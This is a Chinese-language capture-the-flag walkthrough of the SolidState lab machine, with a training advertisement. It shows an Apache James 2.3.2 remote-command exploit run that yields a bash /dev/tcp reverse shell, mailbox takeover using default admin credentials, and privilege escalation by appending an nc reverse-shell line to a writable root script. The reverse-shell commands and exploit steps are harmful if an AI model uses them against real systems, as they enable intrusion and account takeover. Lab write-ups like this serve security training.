靶场奇妙记之SolidState

公众号：泷羽Sec-Ceo

声明！
        学习视频来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下，如涉及侵权马上删除文章，笔记只是方便各位师傅的学习和探讨，文章所提到的网站以及内容，只做学习交流，其他均与本人以及泷羽sec团队无关，切勿触碰法律底线，否则后果自负！！！！有兴趣的小伙伴可以点击下面连接进入b站主页[B站泷羽sec](https://space.bilibili.com/350329294)

系统和工具

        链接：https://pan.quark.cn/s/7c366373a85e
                提取码：5cuD

        链接：https://pan.baidu.com/s/1Rn7mA_-aEh60L_iX4PWjzg?pwd=2w25 
                提取码：2w25
        解压密码：SecCeo或Sec工具

        

        所提供的工具资料仅供学习之用。这些资料旨在帮助用户增进知识、提升技能，并促进个人成长与学习。用户在使用这些资料时，应严格遵守相关法律法规，不得将其用于任何非法、欺诈、侵权或其他不当用途。本人和团队不对用户因使用这些资料而产生的任何后果负责，包括但不限于因操作不当、误解资料内容或违反法律法规而导致的损失或损害。用户应自行承担使用这些资料的风险，并在使用前进行充分的了解和评估。

        团队目前在筹备OSCP+的培训，费用4000，跟其他培训比，泷羽Sec绝对优惠，泷羽Sec的泷老师，是一名资深高级红队队长，拥有OSEP，CISSP，OSCP等等含金量极高的证书。报名可以在”泷羽Sec-Ceo“咨询一下

SolidState

主机发现

nmap -sP 192.168.20.0/24

       Nmap scan report for 192.168.20.109

扫描端口

nmap -sV -O -p 1-65535 192.168.20.109

       22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

       25/tcp  open  smtp    JAMES smtpd 2.3.2

       80/tcp  open  http    Apache httpd 2.4.25 ((Debian))

       110/tcp open  pop3    JAMES pop3d 2.3.2

       119/tcp open  nntp    JAMES nntpd (posting ok)

       4555/tcp open  james-admin JAMES Remote Admin 2.3.2

       MAC Address: 00:0C:29:9A:D3:D7 (VMware)

       Device type: general purpose

       Running: Linux 3.X|4.X

       OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

       OS details: Linux 3.2 - 4.9

       Network Distance: 1 hop

       Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

        开启了JAMES邮件服务

查看 JAMES的漏洞

searchsploit JAMES 2.3.2

       Apache James Server 2.3.2 - Insecure User  | linux/remote/48130.rb

       Apache James Server 2.3.2 - Remote Command | linux/remote/35513.py

       Apache James Server 2.3.2 - Remote Command | linux/remote/50347.py

        有对应版本的漏洞

复制漏洞

searchsploit JAMES -m 50347

        py文件存放到当前目录下

使用说明

python 50347.py

[-]使用方法：python3 50347.py <远程 ip> <local ip> <local 监听端口>

[-]示例：python3 50347.py 172.16.1.66 172.16.1.139 443

[-]注意：默认有效负载是基本的 bash 反向 shell - 请查看脚本了解详细信息和其他选项。

使用脚本

python 50347.py 192.168.20.109 192.168.20.102 8888

[+]已选择有效载荷

（请参阅脚本以获取更多选项：/bin/bash -i >& /dev/tcp/192.168.20.102/8888 0>&1）

[+]成功执行后要使用的 netcat 侦听器语法示例：nc -lvnp 8888

[+]正在连接到 James Remote Administration Tool...

[+]正在创建用户...

[+]正在连接到 James SMTP 服务器...

[+]正在发送负载...

[+]做！一旦有人登录（即通过 SSH），就会执行 Payload。

[+]登录前不要忘记在端口 8888 上启动监听器！

        能连接成功，但需要别人登录才能反弹shell

        说明JAMES的默认用户密码：root/root

监听本地8888端口

nc -lvvp 8888

        监听8888端口留着等下反弹shell

登录JAMES，默认root/root

nc -nv 192.168.20.109 4555

        登录成功

查看用户

listusers

user: james

user: ../../../../../../../../etc/bash_completion.d

user: james

user: john

user: mindy

user: mailadmin

修改用户密码

setPassword james 123456

setPassword thomas 123456

setPassword john 123456

setPassword mindy 123456

setPassword mailadmin 123456

登录john用户

nc -nvC 192.168.20.109 110

user john

pass 123456

查看邮箱邮件

list

retr 1

        邮件中提到关于mindy用户

登录mindy用户查看，邮箱邮件

nc -nvC 192.168.20.109 110

user mindy

pass 123456

list

retr 2

        发现用户和密码

用户名：mindy

口令：P@55W0rd1!2@

ssh登录

ssh mindy@192.168.20.109

        用户名：mindy

        口令：P@55W0rd1!2@

nc监听8888端口反弹shell成功

提权

查找可写入的root文件

find / -type f -user root -perm -o=w 2>/dev/null

        发现/opt/tmp.py文件可以写入

查看文件

cat /opt/tmp.py

#!/usr/bin/env python

import os

import sys

try:

     os.system('rm -r /tmp/*;/bin/sh -i 2>&1|nc 192.168.20.102 5555 ')

except:

     sys.exit()

        通过Python的os.system函数来调用系统命令，定时清理/tmp目录

监听9999端口

nc -lvvp 9999

追加反弹shell到文件里

echo 'os.system("/bin/nc 192.168.20.102 9999 -e /bin/bash")' >> /opt/tmp.py

       等待提权反弹shell

成功提权